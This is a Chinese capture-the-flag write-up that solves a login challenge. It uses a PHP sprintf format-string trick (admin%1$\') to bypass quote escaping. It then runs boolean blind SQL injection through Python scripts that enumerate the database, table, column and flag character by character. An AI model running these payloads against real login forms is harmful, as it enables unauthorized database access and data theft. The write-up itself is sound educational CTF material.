迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

时间:2023-03-09 14:20:29
迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

看题目应该就是注入没跑了

先拿正常输入试试,输了admin,admin,结果返回password error!,说明还真的存在admin账户

拿常规注入语句试探一下admin' and 1=1%23,发生了报错

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

红框这里就给了我们提示,记得之前遇上过一个sprintf格式化字符串所引起的漏洞

具体原理可以参考下面这篇文章

sprintf格式化字符串带来的注入隐患

先按照文中的方法拿admin%1$\' and 1=1%23进行尝试

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

结果返回了username error!,照一开始的测试来说,若and 1=1执行成功应该会返回password error!这里猜测and被和谐了

接着换成or语句试试

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

可以看到这里or语句被成功执行了,接下来就是盲注的时间了(就希望他后面别再过滤啥关键字了)

先看当前数据库的长度:

#coding:utf-8

import requests

import string

dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="

right = 'password error!'

worry = 'username error!'

url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/'

for i in range(30):

    key = "admin%1$\\' or " + "(length(database())=" + str(i) + ")#"

    data = {'username':key, 'password':''}

    r = requests.post(url, data=data).content

    if right in str(r):

        print('the length of database is %s' %i)

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

import requests

import string

dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="

right = 'password error!'

worry = 'username error!'

url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/'

database = ''

for j in range(1,4):

    for each in dic:

        key = "admin%1$\\' or " + "(ascii(substr(database(),%s,1))="%j + str(ord(each)) + ")#"

        data = {'username':key, 'password':''}

        r = requests.post(url, data=data).content

        print(key)

        if right in str(r):

            database += each

            print(each)

            break

print('the name of database is %s'%database)

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

import requests

import string

dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="

right = 'password error!'

worry = 'username error!'

url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/'

i = 1

while True:

    key = "admin%1$\\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=" + str(i) + "#"

    data = {'username':key, 'password':''}

    r = requests.post(url, data=data).content

    print(r)

    if right in str(r):

        print('the length of tables is %s' %i)

        break

    i += 1

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

import requests

import string

dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="

right = 'password error!'

worry = 'username error!'

url = 'http://335ba99138724fb9938bd2756b0c7ba5aba7efad86a84ab9.game.ichunqiu.com/'

table = ''

for i in range(1,5):

    for j in dic:

        key = "admin%1$\\' or " + "(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%s,1))="%i + str(ord(j)) + ")#"

        data = {'username':key, 'password':''}

        r = requests.post(url, data=data).content

        print(key)

        if right in str(r):

            table += j

            print(j)

            break

print('the name of table is %s'%table)

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

接下来的代码我就省略前面定义url、dic这些东西,直接给出判断语句(其实判断语句也很简单,拿着上面跑表的语句改改就好了)

i = 1

while True:

    key = "admin%1$\\' or " + "(select length(column_name) from information_schema.columns where table_name=0x666c6167 limit 0,1)=" + str(i) + "#"

    data = {'username':key, 'password':''}

    r = requests.post(url, data=data).content

    print(r)

    if right in str(r):

        print('the length of columns is %s' %i)

        break

    i += 1

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

column = ''

for i in range(1,5):

    for j in dic:

        key = "admin%1$\\' or " + "(ascii(substr((select column_name from information_schema.columns where table_name=0x666c6167 limit 0,1),%s,1))="%i + str(ord(j)) + ")#"

        data = {'username':key, 'password':''}

        r = requests.post(url, data=data).content

        print(key)

        if right in str(r):

            column += j

            print(j)

            break

print('the name of column is %s'%column)

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

i = 1

while True:

    key = "admin%1$\\' or " + "(select length(flag) from flag limit 0,1)=" + str(i) + "#"

    data = {'username':key, 'password':''}

    r = requests.post(url, data=data).content

    print(key)

    if right in str(r):

        print('the length of data is %s' %i)

        break

    i += 1

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

flag = ''

for i in range(1,43):

    for j in dic:

        key = "admin%1$\\' or " + "(ascii(substr((select flag from flag limit 0,1),%s,1))="%i + str(ord(j)) + ")#"

        data = {'username':key, 'password':''}

        r = requests.post(url, data=data).content

        print(key)

        if right in str(r):

            flag += j

            print(j)

            break

print('the flag is %s'%flag)

迎圣诞,拿大奖活动赛题_SQLi(sprintf格式化字符)

这题的关键还是要知道sprintf格式化字符的漏洞,后面的盲注并没有过滤相关的关键词,导致盲注起来没有压力